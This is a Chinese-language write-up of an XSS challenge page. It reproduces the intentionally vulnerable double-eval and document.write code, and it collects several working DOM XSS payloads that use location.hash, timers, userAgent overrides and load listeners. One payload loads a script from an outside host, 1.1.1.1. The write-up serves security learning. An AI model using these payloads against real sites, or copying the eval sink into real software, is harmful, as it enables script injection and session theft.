起始
有一次看到一位大牛放出的一個 XSS 挑戰頁面：在 name=hi 的 iframe 頁面中執行指定的 JS（prompt(location.href)）即算完成。
地址:
http://server.n0tr00t.com/n0js/case2.html
標準:
Please execute the jscode in the iframe(name=hi): prompt location.href
Work: Chrome, Firefox
case2.html
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>n0js case2</title>
</head>
<body style="margin: -10px 0px 0px 10px;">
<h1>[n0js] case2</h1>
<span>Please execute the jscode in the iframe(name=hi): prompt location.href</span><br>
<span>Work: Chrome, Firefox</span><br>
<span>Datetime: 2016-12-14</span>
<ul>
<li>Submit: evi1m0.bat[at]gmail.com</li>
<li>Casetip: dota2 pudge</li>
<li>Subject by: evi1m0 / server.n0tr00t.com</li>
</ul>
<hr>
<!-- Intentionally vulnerable challenge sink (DOM XSS): the text after the first
     "=" in the query string is passed through eval twice, so any attacker-
     controlled URL executes script on this origin. Because this script runs
     before the iframe below has been parsed, window.hi does not exist yet at
     eval time. Never use this pattern in real code. -->
<script>
// Double eval: split("=")[1] keeps only the text between the first and second "=";
// the inner eval turns it into a value and the outer eval executes that value.
eval(eval((window.location.search.substring(1).split("=")[1])));
</script>
<!-- Frame named "hi", served from the same host as this page; it is parsed
     (and becomes reachable as window.hi) only after the script above has run. -->
<pre>
<iframe name="hi" src="//server.n0tr00t.com/n0js/case2_test.html" style="width: 400px;height: 200px;"></iframe>
</pre>
</body>
</html>
case2_test.html
<script>
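/**
 * Classify the client operating system from navigator data.
 *
 * navigator.platform decides the non-Windows cases (Mac, X11 reported as
 * "Unix", anything containing "Linux"); for Windows platforms the result is
 * refined from navigator.userAgent. Only Windows 2000 through Windows 7 are
 * distinguished; any other Windows build, and any platform not listed,
 * yields "other".
 *
 * @param {{platform: string, userAgent: string}} [nav=navigator] - Navigator-like
 *   object to inspect. Parameterised so the function can be unit-tested outside
 *   a browser; callers that omit it get the global navigator, as before.
 *   Both fields are client-controlled (and, as this challenge shows, can be
 *   redefined by script), so treat the result as a hint, never as a trust
 *   decision.
 * @returns {string} One of "Mac", "Unix", "Linux", "Win2000", "WinXP",
 *   "Win2003", "WinVista", "Win7" or "other".
 */
function getos(nav = navigator) {
  // Coerce once so a missing field compares as the string "undefined" instead of throwing.
  const platform = String(nav.platform);
  const userAgent = String(nav.userAgent);

  const MAC_PLATFORMS = ['Mac68K', 'MacPPC', 'Macintosh', 'MacIntel'];
  if (MAC_PLATFORMS.includes(platform)) return 'Mac';
  // "X11" is what non-Linux Unix browsers report; Mac was already excluded above.
  if (platform === 'X11') return 'Unix';
  if (platform.includes('Linux')) return 'Linux';

  const isWindows = platform === 'Win32' || platform === 'Windows';
  if (!isWindows) return 'other';

  // [NT version token, marketing name, label]; checked in order, first match wins.
  const WINDOWS_VERSIONS = [
    ['Windows NT 5.0', 'Windows 2000', 'Win2000'],
    ['Windows NT 5.1', 'Windows XP', 'WinXP'],
    ['Windows NT 5.2', 'Windows 2003', 'Win2003'],
    ['Windows NT 6.0', 'Windows Vista', 'WinVista'],
    ['Windows NT 6.1', 'Windows 7', 'Win7'],
  ];
  for (const [ntToken, marketingName, label] of WINDOWS_VERSIONS) {
    if (userAgent.includes(ntToken) || userAgent.includes(marketingName)) {
      return label;
    }
  }
  return 'other';
}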
// DOM XSS sink (intentional for the challenge): window.parent.navigator.userAgent is
// concatenated into document.write() with no escaping, so script in the parent that
// redefines navigator.userAgent (e.g. with Object.defineProperty) gets its payload
// rendered as HTML inside this frame. Real code must use textContent for such strings.
document.write('OS:'+getos()+'<br>UA:'+window.parent.navigator.userAgent);
</script>
分析
1. case2.html 中的 js 取 URL query string 裡第一個「=」之後、第二個「=」之前的內容，先 eval 一次得到結果，再把結果 eval 第二次執行（雙重 eval）；因此參數名稱無關緊要，但「=」之後的那一段本身不能再含有未編碼的「=」
2. 頁面先執行這段 script，之後才解析後面的 iframe，所以 eval 執行當下 window.hi 還不存在，必須設法延後到 iframe 載入後再操作
3. 從 URL query 傳入的參數若帶單引號、雙引號，會被瀏覽器 URL 編碼，無法原樣送進 eval
4. case2_test.html 用 document.write 把 window.parent.navigator.userAgent 直接寫入頁面、沒有任何轉義，提示可以從 userAgent 下手
5. 開搞
解決
1. URL 的形式是 case2.html?test=payload（參數名稱可以任意，因為只取第一個「=」後面的值）
2. 三種思路：延時執行 js，等 iframe 載入後再往裡面注入；修改瀏覽器的 navigator 屬性（userAgent / platform），讓 iframe 在 document.write 時把 payload 寫進去；綁定監聽頁面 load 事件，載入完成後再操作 iframe
3. URL 中「#」後面（location.hash）的單雙引號等字符不會被瀏覽器編碼，也不會送到伺服器，所以第一次 eval 先取出 location.hash 的內容，再交給第二次 eval 執行
case1: 延時加載js
解法一:
case2.html?a=location.hash.substr(1)#setTimeout("w=window['hi'];s=w.document.createElement('script');s.src='http://1.1.1.1/1.js';w.document.body.appendChild(s);", 2000) //@piaca
解法二:
case2.html?a=location.hash.substr(1)#setTimeout("hi.eval('prompt(location.href)')",500) // @fyth
case2: 修改瀏覽器屬性
解法一:
case2.html?a=window.location.hash.substring(1)#Object.defineProperty(navigator,'userAgent',{get:function(){return '<script>prompt(location.href)</script>';}}) //@gaoheby
解法二:
case2.html?a=location.hash.substr(1)#navigator.__defineGetter__('userAgent', function(){ return '<svg/onload=prompt(location.href)>'}) // @fyth
解法三:
case2.html?a=location.hash.substr(1)#var frame = document.createElement('iframe'); frame.style.display = 'none'; document.body.appendChild(frame); function navigator(){} window.navigator = new Proxy(window.frames[0].window.navigator, { get: function(n0t){return "<img src=@ onerror=alert(location.href)>";} }) // @evi1m0
解法四:
case2.html?a=location.hash.substr(1)#function createProperty(value){var _value=value;function _get(){return _value}function _set(v){_value=v}return{"get":_get,"set":_set}}; function makePropertyWritable(objBase,objScopeName,propName,initValue){var newProp,initObj;if(objBase&&objScopeName in objBase&&propName in objBase[objScopeName]) {if(typeof initValue==="undefined"){initValue=objBase[objScopeName][propName]}newProp=createProperty(initValue);try{Object.defineProperty(objBase[objScopeName],propName,newProp)} catch(e){initObj={};initObj[propName]=newProp;try{objBase[objScopeName]=Object.create(objBase[objScopeName],initObj)}catch(e){}}}}; makePropertyWritable(window,"navigator","userAgent"); window.navigator.userAgent="<script>prompt(location.href)</script>"; // 1124696276
case3: 綁定監聽頁面load屬性
case2.html?test=location.hash.substr(1)#window.addEventListener('load', function(){window.hi.prompt(hi.location.href)})
最後
作者測試頁面：
http://server.n0tr00t.com/n0js/
上面幾個解法都來自此頁面，作者又放出了一個新的 case，歡迎感興趣的去玩耍、多學習。
MDN的 JavaScript文檔:
https://developer.mozilla.org/zh-CN/docs/Web/JavaScript
好好學習每天向上,thx piaca & NorthOrchid。